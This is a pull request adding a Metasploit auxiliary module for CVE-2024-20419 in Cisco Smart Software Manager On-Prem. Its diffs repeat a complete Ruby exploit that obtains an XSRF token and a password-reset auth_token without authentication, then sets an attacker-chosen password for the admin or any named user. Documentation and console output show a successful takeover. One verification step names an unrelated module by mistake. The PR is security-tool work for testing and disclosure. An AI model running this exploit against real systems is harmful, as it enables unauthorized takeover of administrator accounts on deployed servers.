### PR TITLE
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/cisco_ssm_onprem_account.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ssm_onprem_account.md
@@ -1,0 +1,57 @@
+## Vulnerable Application
+
+This module exploits an account takeover vulnerability in Cisco SSM On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the
+admin user.
+
+The vendor published an advisory [here]
+(https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy). The original research blog
+is available [here](https://www.0xpolar.com/blog/CVE-2024-20419).
+
+## Testing
+
+The software can be obtained from the [vendor](https://software.cisco.com/download/home/286285506/type/286326948/release/9-202407).
+
+Deploy it by following the vendor's [installation guide]
+(https://www.cisco.com/web/software/286285517/152313/Smart_Software_Manager_On-Prem_8-202006_Installation_Guide.pdf).
+
+**Successfully tested on**
+
+- Cisco Smart Software Manager v8-202206.
+
+## Verification Steps
+
+1. Deploy Cisco Smart Software Manager v8-202206
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli`
+4. `set RHOSTS <IP>`
+5. `set NEW_PASSWORD <password>`
+6. `run`
+7. A new password should have been set for the admin account.
+
+## Options
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against Smart Software Manager v8-202206 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
+msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
+msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set SSL true
+msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
+[*] Running module against 192.168.137.200
+
+[*] Starting workflow...
+[+] Server reachable.
+[*] xsrf_token: B%2BxNjt72KTh%2BW%2FYhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R%2BvtX%2FLK%2B1A%3D%3D
+[*] xsrf_token: B+xNjt72KTh+W/YhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R+vtX/LK+1A==
+[*] _lic_engine_session: f517481befa8b1a7cddcb1d755b8163c
+[+] Server reachable.
+[*] auth_token: 21bf4695d594af3bd5f0f07db2ce8f09f29abe6f9295e2649e3fa5f266ada2a1
+[+] Server reachable.
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/admin/http/cisco_ssm_onprem_account.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ssm_onprem_account.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-This module exploits an account takeover vulnerability in Cisco SSM On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the
-admin user.
+This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419),
+by changing the password of the admin user.
 
 The vendor published an advisory [here]
 (https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy). The original research blog
@@ -16,42 +16,40 @@ Deploy it by following the vendor's [installation guide]
 
 **Successfully tested on**
 
-- Cisco Smart Software Manager v8-202206.
+- Cisco Smart Software Manager (SSM) On-Prem v8-202206.
 
 ## Verification Steps
 
-1. Deploy Cisco Smart Software Manager v8-202206
+1. Deploy Cisco Smart Software Manager (SSM) On-Prem v8-202206
 2. Start `msfconsole`
 3. `use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli`
 4. `set RHOSTS <IP>`
-5. `set NEW_PASSWORD <password>`
-6. `run`
-7. A new password should have been set for the admin account.
+5. `run`
+6. A new password should have been set for the admin account.
 
 ## Options
 
+### USER
+The user of which the password should be changed (default: admin)
 ### NEW_PASSWORD
 Password to be used when creating a new user with admin privileges.
 
 ## Scenarios
 
-Running the module against Smart Software Manager v8-202206 should result in an output
+Running the module against Smart Software Manager (SSM) On-Prem v8-202206 should result in an output
 similar to the following:
 
 ```
 msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
 msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
-msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set SSL true
 msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
 [*] Running module against 192.168.137.200
 
-[*] Starting workflow...
 [+] Server reachable.
-[*] xsrf_token: B%2BxNjt72KTh%2BW%2FYhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R%2BvtX%2FLK%2B1A%3D%3D
-[*] xsrf_token: B+xNjt72KTh+W/YhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R+vtX/LK+1A==
-[*] _lic_engine_session: f517481befa8b1a7cddcb1d755b8163c
-[+] Server reachable.
-[*] auth_token: 21bf4695d594af3bd5f0f07db2ce8f09f29abe6f9295e2649e3fa5f266ada2a1
-[+] Server reachable.
+[+] Retrieved XSRF Token: RAjYUE7aNosSoXUHQu3S2VWj2h+t5ioGFCV8PwMIkNIkX15f1H10sJJY5V1yTG6tsSkhonOIr2lI3VhseclCRw==
+[+] Retrieved _lic_engine_session: 22b193146b9071bbf695182f22bfcb09
+[+] Retrieved auth_token: 73e63ab74a07d9d4099d0c9918c21ceaad1c2db94058b32aa6d990178dbe13b5
+[+] Password for the admin user was successfully updated: Epd45bZ9OCJIFiEr!
+[+] Login at: http://192.168.137.200:8443/#/logIn?redirectURL=%2F
 [*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
+++ b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -153,6 +153,7 @@ class MetasploitModule < Msf::Auxiliary
       if json.key?('error_message')
         fail_with(Failure::UnexpectedReply, json['error_message'])
       else
+        store_valid_credential(user: datastore['USER'], private: datastore['NEW_PASSWORD'], proof: json)
         print_good("Password for the #{datastore['USER']} user was successfully updated: #{datastore['NEW_PASSWORD']}")
         print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}/#/logIn?redirectURL=%2F") end
     else

--- a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
+++ b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -40,8 +40,8 @@ class MetasploitModule < Msf::Auxiliary
     ])
   end
 
-  def check
-    # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
+  # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
+  def xsrf_token_value
     res = send_request_cgi(
       'method' => 'GET',
       'keep_cookies' => true,
@@ -59,8 +59,11 @@ class MetasploitModule < Msf::Auxiliary
 
     decoded_xsrf_token = decode_url(xsrf_token_value)
     print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
+    decoded_xsrf_token
+  end
 
-    # 2) Request generate_code to retrieve auth_token
+  # 2) Request generate_code to retrieve auth_token
+  def auth_token(decoded_xsrf_token)
     payload = {
       uid: datastore['USER']
     }.to_json
@@ -86,8 +89,11 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     auth_token = json['auth_token']
+    auth_token
+  end
 
-    # 3) Request reset_password to change the password of the specified user
+  # 3) Request reset_password to change the password of the specified user
+  def reset_password(decoded_xsrf_token, auth_token)
     payload = {
       uid: datastore['USER'],
       auth_token: auth_token,
@@ -110,9 +116,22 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::UnexpectedReply, 'Password reset attempt failed') unless res&.code == 200
 
     json = res.get_json_document
-    if json.key?('error')
+    json
+  end
+
+  def check
+    @xsrf_token_value = xsrf_token_value
+    return Exploit::CheckCode::Unknown('Unable to determine the version (xsrf_token_value missing).') unless @xsrf_token_value
+
+    @auth_token = auth_token(@xsrf_token_value)
+    return Exploit::CheckCode::Unknown('Unable to determine the version (auth_token missing).') unless @auth_token
+
+    @reset_password = reset_password(@xsrf_token_value, @auth_token)
+    return Exploit::CheckCode::Unknown('Unable to determine the version (reset_password failed).') unless @reset_password
+
+    if @reset_password.key?('error')
       return Exploit::CheckCode::Safe
-    elsif json.key?('status')
+    elsif @reset_password.key?('status')
       return Exploit::CheckCode::Appears
     end
 
@@ -126,79 +145,9 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
-    res = send_request_cgi(
-      'method' => 'GET',
-      'keep_cookies' => true,
-      'uri' => normalize_uri(target_uri.path, 'backend/settings/oauth_adfs'),
-      'vars_get' => {
-        'hostname' => Rex::Text.rand_text_alpha(6..10)
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, 'Failed to get a 200 response from the server.') unless res&.code == 200
-    print_good('Server reachable.')
-
-    # Extract XSRF-TOKEN value
-    xsrf_token_value = res.get_cookies.scan(/XSRF-TOKEN=([^;]*)/).flatten[0]
-    fail_with(Failure::UnexpectedReply, 'XSRF Token not found') unless xsrf_token_value
-
-    decoded_xsrf_token = decode_url(xsrf_token_value)
-    print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
-
-    # 2) Request generate_code to retrieve auth_token
-    payload = {
-      uid: datastore['USER']
-    }.to_json
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token
-      },
-      'uri' => normalize_uri(target_uri.path, 'backend/reset_password/generate_code'),
-      'data' => payload
-    })
-
-    fail_with(Failure::UnexpectedReply, 'Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response') unless res&.code == 200
-
-    json = res.get_json_document
-    if json.key?('error_message')
-      fail_with(Failure::UnexpectedReply, json['error_message'])
-    elsif json.key?('auth_token')
-      print_good('Retrieved auth_token: ' + json['auth_token'])
-    end
-
-    auth_token = json['auth_token']
-
-    # 3) Request reset_password to change the password of the specified user
-    payload = {
-      uid: datastore['USER'],
-      auth_token: auth_token,
-      password: datastore['NEW_PASSWORD'],
-      password_confirmation: datastore['NEW_PASSWORD'],
-      common_name: ''
-    }.to_json
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token
-      },
-      'uri' => normalize_uri(target_uri.path, 'backend/reset_password'),
-      'data' => payload
-    })
-
-    fail_with(Failure::UnexpectedReply, 'Password reset attempt failed') unless res&.code == 200
-
-    json = res.get_json_document
-    if json.key?('error_message')
-      fail_with(Failure::UnexpectedReply, json['error_message'])
-    end
+    @xsrf_token_value ||= xsrf_token_value
+    @auth_token ||= auth_token(@xsrf_token_value)
+    @reset_password ||= reset_password(@xsrf_token_value, @auth_token)
 
     # 4) Confirm that we can authenticate with the new password
     payload = {
@@ -211,7 +160,7 @@ class MetasploitModule < Msf::Auxiliary
       'ctype' => 'application/json',
       'keep_cookies' => true,
       'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token,
+        'X-Xsrf-Token' => @xsrf_token_value,
         'Accept' => 'application/json'
       },
       'uri' => normalize_uri(target_uri.path, 'backend/auth/identity/callback'),

--- a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
+++ b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -5,10 +5,10 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'Cisco SSM On-Prem Account Takeover (CVE-2024-20419)',
+        'Name' => 'Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)',
         'Description' => %q{
-          This module exploits an account takeover vulnerability in Cisco SSM On-Prem <= 8-202206, by changing the
-          password of the admin user to an attacker-controlled one..
+          This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206, by changing the
+          password of an existing user to an attacker-controlled one.
         },
         'Author' => [
           'Mohammed Adel', # Discovery and PoC
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DisclosureDate' => '2024-07-20',
         'DefaultOptions' => {
-          'RPORT' => 8443
+          'RPORT' => 8443,
+          'SSL' => 'True'
         },
         'License' => MSF_LICENSE,
         'Notes' => {
@@ -33,19 +34,24 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     register_options([
-      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)])
+      OptString.new('NEW_PASSWORD', [true, 'New password for the specified user', Rex::Text.rand_text_alphanumeric(16) + '!']),
+      OptString.new('USER', [true, 'The user of which to change the password of (default: admin)', 'admin'])
     ])
   end
 
-  def run
-    # 1) Request oauth_adfs
-    print_status('Starting workflow...')
+  def decode_url(encoded_string)
+    encoded_string.gsub(/%([0-9A-Fa-f]{2})/) do
+      [::Regexp.last_match(1).to_i(16)].pack('C')
+    end
+  end
 
+  def run
+    # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend/settings/oauth_adfs'),
       'vars_get' => {
-        'hostname' => 'AAAAA'
+        'hostname' => Rex::Text.rand_text_alpha(6..10)
       }
     )
 
@@ -64,27 +70,43 @@ class MetasploitModule < Msf::Auxiliary
     # Extract XSRF-TOKEN value
     xsrf_token_regex = /XSRF-TOKEN=([^;]*)/
     xsrf_token = xsrf_token_regex.match(raw_res)
-    print_status('xsrf_token: ' + xsrf_token[1])
 
-    decoded_xsrf_token = decode_url(xsrf_token[1])
-    print_status('xsrf_token: ' + decoded_xsrf_token)
+    if xsrf_token
+      xsrf_token_value = xsrf_token[1]
+      if xsrf_token_value && !xsrf_token_value.empty?
+        decoded_xsrf_token = decode_url(xsrf_token_value)
+        print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
+      else
+        fail_with(Failure::UnexpectedReply, 'XSRF Token value is null or empty.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'XSRF Token not found')
+    end
 
     # Extract _lic_engine_session value
     lic_token_regex = /_lic_engine_session=([^;]*)/
     lic_token = lic_token_regex.match(raw_res)
-    decoded_lic_token = decode_url(lic_token[1])
 
-    print_status('_lic_engine_session: ' + decoded_lic_token)
+    if lic_token
+      lic_token_value = lic_token[1]
+      if lic_token_value && !lic_token_value.empty?
+        print_good("Retrieved _lic_engine_session: #{lic_token_value}")
+      else
+        fail_with(Failure::UnexpectedReply, '_lic_engine_session value is null or empty.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, '_lic_engine_session not found')
+    end
 
-    # 2) generate_code
-    payload = '{"uid": "admin"}'
+    # 2) Request generate_code to retrieve auth_token
+    payload = "{\"uid\": \"#{datastore['USER']}\"}"
 
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'application/json',
       'headers' => {
         'X-Xsrf-Token' => decoded_xsrf_token,
-        'Cookie' => "_lic_engine_session=#{decoded_lic_token}; XSRF-TOKEN=#{decoded_xsrf_token}"
+        'Cookie' => "_lic_engine_session=#{lic_token_value}; XSRF-TOKEN=#{decoded_xsrf_token}"
       },
       'uri' => normalize_uri(target_uri.path, '/backend/reset_password/generate_code'),
       'data' => payload
@@ -95,26 +117,27 @@ class MetasploitModule < Msf::Auxiliary
     end
     case res.code
     when 200
-      print_good('Server reachable.')
+      json = res.get_json_document
+      if json.key?('error_message')
+        fail_with(Failure::UnexpectedReply, json['error_message'])
+      elsif json.key?('auth_token')
+        print_good('Retrieved auth_token: ' + json['auth_token'])
+      end
     else
       fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
     end
 
-    raw_res = res.body
+    auth_token = json['auth_token']
 
-    auth_token_regex = /"auth_token":"([^"]*)"/
-    auth_token = auth_token_regex.match(raw_res)
-    print_status('auth_token: ' + auth_token[1])
-
-    # 3) reset_password
-    payload = "{\"uid\": \"admin\", \"auth_token\": \"#{auth_token[1]}\", \"password\": \"Testbaaasab@123456780\", \"password_confirmation\": \"Testbaaasab@123456780\", \"common_name\": \"\"}"
+    # 3) Request reset_password to change the password of the specified user
+    payload = "{\"uid\": \"#{datastore['USER']}\", \"auth_token\": \"#{auth_token}\", \"password\": \"#{datastore['NEW_PASSWORD']}\", \"password_confirmation\": \"#{datastore['NEW_PASSWORD']}\", \"common_name\": \"\"}"
 
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'application/json',
       'headers' => {
         'X-Xsrf-Token' => decoded_xsrf_token,
-        'Cookie' => "_lic_engine_session=#{decoded_lic_token}; XSRF-TOKEN=#{decoded_xsrf_token}"
+        'Cookie' => "_lic_engine_session=#{lic_token_value}; XSRF-TOKEN=#{decoded_xsrf_token}"
       },
       'uri' => normalize_uri(target_uri.path, '/backend/reset_password'),
       'data' => payload
@@ -123,19 +146,17 @@ class MetasploitModule < Msf::Auxiliary
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
+
     case res.code
     when 200
-      print_good('Server reachable.')
+      json = res.get_json_document
+      if json.key?('error_message')
+        fail_with(Failure::UnexpectedReply, json['error_message'])
+      else
+        print_good("Password for the #{datastore['USER']} user was successfully updated: #{datastore['NEW_PASSWORD']}")
+        print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}/#/logIn?redirectURL=%2F") end
     else
       fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
     end
-
   end
-
-  def decode_url(encoded_string)
-    encoded_string.gsub(/%([0-9A-Fa-f]{2})/) do
-      [::Regexp.last_match(1).to_i(16)].pack('C')
-    end
-  end
-
 end

--- a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
+++ b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -1,0 +1,141 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco SSM On-Prem Account Takeover (CVE-2024-20419)',
+        'Description' => %q{
+          This module exploits an account takeover vulnerability in Cisco SSM On-Prem <= 8-202206, by changing the
+          password of the admin user to an attacker-controlled one..
+        },
+        'Author' => [
+          'Mohammed Adel', # Discovery and PoC
+          'Michael Heinzl' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2024-20419'],
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy#vp'],
+          ['URL', 'https://www.0xpolar.com/blog/CVE-2024-20419']
+        ],
+        'DisclosureDate' => '2024-07-20',
+        'DefaultOptions' => {
+          'RPORT' => 8443
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)])
+    ])
+  end
+
+  def run
+    # 1) Request oauth_adfs
+    print_status('Starting workflow...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend/settings/oauth_adfs'),
+      'vars_get' => {
+        'hostname' => 'AAAAA'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    case res.code
+    when 200
+      print_good('Server reachable.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.to_s
+
+    # Extract XSRF-TOKEN value
+    xsrf_token_regex = /XSRF-TOKEN=([^;]*)/
+    xsrf_token = xsrf_token_regex.match(raw_res)
+    print_status('xsrf_token: ' + xsrf_token[1])
+
+    decoded_xsrf_token = decode_url(xsrf_token[1])
+    print_status('xsrf_token: ' + decoded_xsrf_token)
+
+    # Extract _lic_engine_session value
+    lic_token_regex = /_lic_engine_session=([^;]*)/
+    lic_token = lic_token_regex.match(raw_res)
+    decoded_lic_token = decode_url(lic_token[1])
+
+    print_status('_lic_engine_session: ' + decoded_lic_token)
+
+    # 2) generate_code
+    payload = '{"uid": "admin"}'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Xsrf-Token' => decoded_xsrf_token,
+        'Cookie' => "_lic_engine_session=#{decoded_lic_token}; XSRF-TOKEN=#{decoded_xsrf_token}"
+      },
+      'uri' => normalize_uri(target_uri.path, '/backend/reset_password/generate_code'),
+      'data' => payload
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    case res.code
+    when 200
+      print_good('Server reachable.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.body
+
+    auth_token_regex = /"auth_token":"([^"]*)"/
+    auth_token = auth_token_regex.match(raw_res)
+    print_status('auth_token: ' + auth_token[1])
+
+    # 3) reset_password
+    payload = "{\"uid\": \"admin\", \"auth_token\": \"#{auth_token[1]}\", \"password\": \"Testbaaasab@123456780\", \"password_confirmation\": \"Testbaaasab@123456780\", \"common_name\": \"\"}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Xsrf-Token' => decoded_xsrf_token,
+        'Cookie' => "_lic_engine_session=#{decoded_lic_token}; XSRF-TOKEN=#{decoded_xsrf_token}"
+      },
+      'uri' => normalize_uri(target_uri.path, '/backend/reset_password'),
+      'data' => payload
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    case res.code
+    when 200
+      print_good('Server reachable.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+  end
+
+  def decode_url(encoded_string)
+    encoded_string.gsub(/%([0-9A-Fa-f]{2})/) do
+      [::Regexp.last_match(1).to_i(16)].pack('C')
+    end
+  end
+
+end

--- a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
+++ b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -58,8 +58,7 @@ class MetasploitModule < Msf::Auxiliary
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
-    case res.code
-    when 200
+    if res.code == 200
       print_good('Server reachable.')
     else
       fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
@@ -115,8 +114,7 @@ class MetasploitModule < Msf::Auxiliary
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
-    case res.code
-    when 200
+    if res.code == 200
       json = res.get_json_document
       if json.key?('error_message')
         fail_with(Failure::UnexpectedReply, json['error_message'])
@@ -147,8 +145,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
 
-    case res.code
-    when 200
+    if res.code == 200
       json = res.get_json_document
       if json.key?('error_message')
         fail_with(Failure::UnexpectedReply, json['error_message'])


### PR DESCRIPTION
This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the admin user to an attacker-controlled one.

## Verification Steps

1. Download the application from the [vendor](https://software.cisco.com/download/home/286285506/type/286326948/release/9-202407).
2. Deploy it by following the vendor's [installation guide](https://www.cisco.com/web/software/286285517/152313/Smart_Software_Manager_On-Prem_8-202006_Installation_Guide.pdf).
3. Start `msfconsole`
4. `use auxiliary/admin/http/cisco_ssm_onprem_account`
5. `set RHOSTS <IP>`
6. `set SSL true`
7. `run`

A new password (currently hardcoded to `Testbaaasab@123456780`) should have been set for the `admin` account.

```
msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set SSL true
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.137.200

[*] Starting workflow...
[+] Server reachable.
[*] xsrf_token: B%2BxNjt72KTh%2BW%2FYhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R%2BvtX%2FLK%2B1A%3D%3D
[*] xsrf_token: B+xNjt72KTh+W/YhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R+vtX/LK+1A==
[*] _lic_engine_session: f517481befa8b1a7cddcb1d755b8163c
[+] Server reachable.
[*] auth_token: 21bf4695d594af3bd5f0f07db2ce8f09f29abe6f9295e2649e3fa5f266ada2a1
[+] Server reachable.
[*] Auxiliary module execution completed
```

**Successfully tested on**

- Cisco Smart Software Manager v8-202206
